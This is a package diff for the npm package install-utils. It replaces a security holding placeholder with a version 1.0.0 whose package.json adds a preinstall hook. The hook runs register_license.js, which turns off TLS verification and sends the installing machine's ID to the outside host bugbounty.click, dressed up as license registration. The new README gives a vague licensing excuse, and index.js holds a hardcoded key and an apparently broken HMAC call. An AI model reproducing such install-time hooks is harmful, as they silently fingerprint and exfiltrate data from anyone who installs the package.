install-utils 0.0.1-security → 1.0.0

package/README.md

@@ -1,5 +1,3 @@
-# Security holding package
+# Install Utils
 
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=install-utils for more information.
+Please bear with us whilst we sort licensing issues.

package/index.js

@@ -0,0 +1,9 @@
+import hmac from 'js-crypto-hmac';
+
+export default function getInstallKey(value) {
+  const key = "JH98227773929JJHHhhj287822o909182";
+  const msg = value;
+  const hash = 'SHA-512';
+
+  return hmac.computer(key, msg, hash);
+}

package/package.json

@@ -1,6 +1 @@
-{
-  "name": "install-utils",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
-}
+{"name":"install-utils","version":"1.0.0","description":"Install utils","main":"index.js","scripts":{"test":"echo \"Error: no test specified\" && exit 1","preinstall":"node register_license.js"},"author":"","license":"ISC","dependencies":{"js-crypto-hmac":"^1.0.4","node-machine-id":"^1.1.12"},"type":"module"}

package/register_license.js

@@ -0,0 +1,16 @@
+// Note that if this fails to register your license, then please make sure you have added all your licenses to the portal. The machine ID should be /var/lib/dbus/machine-id on Linux or HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography in Windows. Please see the documentation sent to you for details.
+import machineIdSync from 'node-machine-id'; 
+import https from 'https';
+
+process.env['NODE_TLS_REJECT_UNAUTHORIZED'] = 0;
+
+const options = {
+  hostname: 'bugbounty.click',
+  port: 443,
+  path: '/licensing/register.php?Username=' + encodeURI(machineIdSync.machineIdSync()) + '&Package=install-utils',
+  method: 'GET'
+}
+
+const req = https.request(options)
+
+req.end();